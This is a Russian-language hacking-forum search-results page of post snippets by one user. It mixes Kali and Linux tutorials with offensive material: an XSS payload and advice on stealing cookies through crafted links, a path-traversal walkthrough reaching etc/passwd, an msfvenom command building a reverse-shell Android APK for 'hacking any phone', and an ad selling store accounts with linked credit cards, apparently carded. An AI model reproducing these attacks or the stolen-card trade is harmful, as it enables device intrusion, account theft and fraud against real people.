Результаты поиска

  1. Voodley

    Приручаем WAF

    В данной "книге" хорошо расписано о том как обходить WAF https://yadi.sk/i/1lBWP39e36yPba
  2. Voodley

    Начинающим Использование пассивной XSS

    Пассивная уязвимость уже требует каких либо действий со стороны жертвы, надо будет чтобы жертва перешла по сформированной нами ссылке, чтобы получить куки.Пример пассивной XSS: На сайте есть строка поиска информации по сайту, при вводе яваскрипт кода в этой строке, также выскакивает окно. Это...
  3. Voodley

    Начинающим Использование активной XSS уязвимости

    Для того, чтобы найти XSS на сайте, нужно вводить даный яваскрипт код во всех доступных формах для ввода на сайте: <script>alert(hacked)</script> Увидите что выскочило окошко hacked,значит уязвимость на данном сайте присутствует. XSS уязвимости бывают 2х видов, пассивные и активные. Мы...
  4. Voodley

    Hackme [Есть победитель]

    Спасибо,p.s сори за набив
  5. Voodley

    Hackme [Есть победитель]

    Уязвимость была обнаружена.Я зашел на сайт,посмотрел чем отличаются страницы phpinfo.php,test.php,menu.php,index.php.Посмотрел phpinfo.php,определил в какой директории находиться etc/passwd,путь был таков var/www/html/ ,соответственно я понял что до passwd 4 перехода,на index.php не было...
  6. Voodley

    Hackme [Есть победитель]

    Пусть плюсанут те кто участвует ))
  7. Voodley

    Hackme [Есть победитель]

    Все что душе угодно)
  8. Voodley

    Архив Продаю акк+сс

    Продаю аккаунты с привязанными сс, магазин приватный,в нём только одежда!!! От таких производителей как (Tommy Helfiger,Adidas,Nike,Reebok и тд). Акаунты почти все с USA. Так же имеется магазин с одеждой TheNorthFace. Цена за 1шт:4$,продаю только оптом! Контактные данные:скайп poxi.poxi2, либо...
  9. Voodley

    Чем опасны публичные VPN

    Как ломается связка из публичных VPN Серверов: Связка: Double VPN (New York - Berlin) =VMWare=Dedic Возьмем в пример что вы вбили какой либо товар, залили чтолибо и любое действие. - Владелец шопа, успешно залогинил ваше посещение, знает с какого айпи вы заходили а так же всю необходимую инфу...
  10. Voodley

    Психология & СИ Психологические хитрости

    1. Попросите об одолжении Мы говорим об эффекте, известном как эффект Бенджамина Франклина. Однажды Франклину понадобилось завоевать расположение человека, который его очень не любил. Тогда Франклин вежливо попросил этого человека одолжить ему редкую книгу и, получив желаемое, ещё более вежливо...
  11. Voodley

    Начинающим Всё что нужно хакеру на Android

    Хотел бы немного рассказать об хакерских утилитах на ОС Android. Многие ей интересуются, но на форуме информации о ней мало. Данная ось очень удобна своей портативностью, ПК вы не везде с собой таскаете))) Вот несколько программ, думаю вам будут интересны, ну думаю про Root права рассказывать не...
  12. Voodley

    Kali Как добавить/удалить обычного (не рута) пользователя в Kali Linux

    Добавление пользователя Kali Linux: Откройте терминал и напечатайте туда следующее для создания нового пользователя (замените mial на желаемое имя пользователя): useradd -m mial (Примечание: -m означает создание домашней директории, которой обычно является /home/имя_пользователя) Теперь...
  13. Voodley

    Kali Как сбросить пароль root'а в kali linux

    Пароль root в Kali Linux Как правило, пароль мы задаём сами при установке системы. Бывают исключения — например, при прожиге на флешку live-образа, либо при установке ARM-версий Kali Linux. В любом случае для начала, попробуйте пароль: toor Если забыл пароль от Kali Linux Небольшие неприятности...
  14. Voodley

    Команды Linux которые вы должны знать

    Команды Linux для управления файлами 1. ls Утилита для просмотра содержимого каталогов. По умолчанию показывает текущий каталог. Если в параметрах передать путь, то она перечислит содержимое того каталога. Полезные опции -l (List) и -a (All). Первая форматирует вывод в виде списка с более...
  15. Voodley

    Сканируем Linux на руткиты с помощью rkhunter

    Руткиты (rootkit) — это вредоносные программы, созданные для получения доступа уровня рута, при этом они прячут своё присутствие от антивирусных программ. Обычно руткиты устнавливаются на вашу систему троянами, содержащимися вместе с загруженными файлами, через известные системные уязвимости...
  16. Voodley

    Осуществляем атаку на телефон

    что за задарма?
  17. Voodley

    DIRB: поиск скрытых каталогов и файлов на веб-сайтах

    DIRB — это сканер веб-контента. Он ищет существующие (возможно, скрытые) веб-объекты. В основе его работы лежит поиск по словарю, он формирует запросы к веб-серверу и анализирует ответ. DIRB поставляется с набором настроенных на атаку словарей для простого использования, но вы можете...
  18. Voodley

    Начинающим Сканируем на уязвимости WordPress: WPScanner

    WordPress завоевал заслуженную популярность. Каждый день запускается огромное количество новых сайтов на этом движке. Быстрее самого WordPress распространяются только дыры в скриптах, поскольку эти дыры могут быть не только в коде движка, но и в любом из огромного количества его плагинов и даже...
  19. Voodley

    Начинающим Разновидности вредоносного программного обеспечения.

    Всякий раз, когда компьютер начинает вести себя странно и перестает слушаться, первое, что приходит в голову — не заразился ли компьютер "вирусом". В таком случае страхи могут оказаться небезосновательными. Следовательно, желательно узнать об этих врагах компьютера и получить общее представление...
  20. Voodley

    Осуществляем атаку на телефон

    чего такой большой хайд?
  21. Voodley

    Metasploit на простом языке.

    Гайд будет не очень большой,но многим он должен помочь.Итак приступим. После того как вы просканили ваш сайт(жертву) на наличие открытых портов и сервисов которые на них висят,приступаем к самому metasploit. Как его запустить? 1) service postgresql start 2) msfdb init 3) msfconsole Далее мы...
  22. Voodley

    Начинающим Что такое криптология

    ПРЕДМЕТ КРИПТОЛОГИИ Описание предмета криптологии начнем с доуточнения обиходного понятия информация. Иностранному термину информация достаточно близко отвечает русское слово смысл. Очевидно, что одну и ту же информацию можно передать разными сообщениями, например, на разных языках, а также...
  23. Voodley

    Новости История компьютерного андеграунда: Хакеры 80-х

    Из-за своего размера и космической цены, долгое время компьютеры были недоступны простым людям. Компанию IBM, владеющую в 50х гг. 95% всего компьютерного рынка, вполне устраивали многомиллионные продажи и правительственная клиентура. Поэтому ее руководство даже не пыталось начать разработки...
  24. Voodley

    Взламываем любой телефон на Android

    Установка и использование msfvenom payload: 1. Запустите kali и откройте панель управления. 2. Установите payload и создайте всплывающее окно пользователя вот этой командой: msfvenom -p android/meterpreter/reverse_tcp LHOST=указываем свой ip LPORT=4444 R > android.apk Файл apk сохранен в...
  25. Voodley

    Начинающим Как использовать Nmap

    Собираем информацию об открытых на сервере портах, запущенных службах и версиях программного обеспечения Это простая команда может использоваться для проверки доступен ли сайт (в данном случае я использовал сайт codeby.net). Обращаем внимание на открытые порты: nmap -sS [IPадрес] или [адрес...